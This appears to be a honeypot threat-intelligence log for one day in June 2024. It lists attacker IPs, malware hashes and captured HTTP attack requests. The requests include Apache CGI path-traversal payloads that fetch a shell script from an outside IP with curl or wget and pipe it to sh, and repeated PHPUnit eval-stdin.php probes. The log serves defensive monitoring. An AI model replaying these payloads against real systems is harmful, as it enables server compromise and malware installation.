Top 5 IPs for 2024-06-01 :

170.64.226.121
42.5.87.142
111.78.206.235
112.239.98.5
112.248.101.160

Malware Observed:

0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257
https://www.virustotal.com/gui/file/0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257
76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64
https://www.virustotal.com/gui/file/76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64
a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437
https://www.virustotal.com/gui/file/a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437
d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0
https://www.virustotal.com/gui/file/d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0
aaf4dfde16518d14426477d98d37ea47ec2d598db93b0f5dd7811a56b97cd7f8
https://www.virustotal.com/gui/file/aaf4dfde16518d14426477d98d37ea47ec2d598db93b0f5dd7811a56b97cd7f8
fe4950561d2a88a1643fcf94894c3f9e2ecffb3d1c3f5ae7763c3e819974e4de
https://www.virustotal.com/gui/file/fe4950561d2a88a1643fcf94894c3f9e2ecffb3d1c3f5ae7763c3e819974e4de


Commands/exploits observed:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 109
Content-Type: text/plain

X=$(curl http://93.123.39.27/jVA.sh || wget http://93.123.39.27/jVA.sh -O-); echo \"$X\" | sh -s apache.selfrep

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 109
Content-Type: text/plain

X=$(curl http://93.123.39.27/jVA.sh || wget http://93.123.39.27/jVA.sh -O-); echo \"$X\" | sh -s apache.selfrep

GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));

GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));

GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));

GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));

GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 33
Content-Type: text/plain

<?php echo(md5(\"Hello PHPUnit\"));GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST-IP
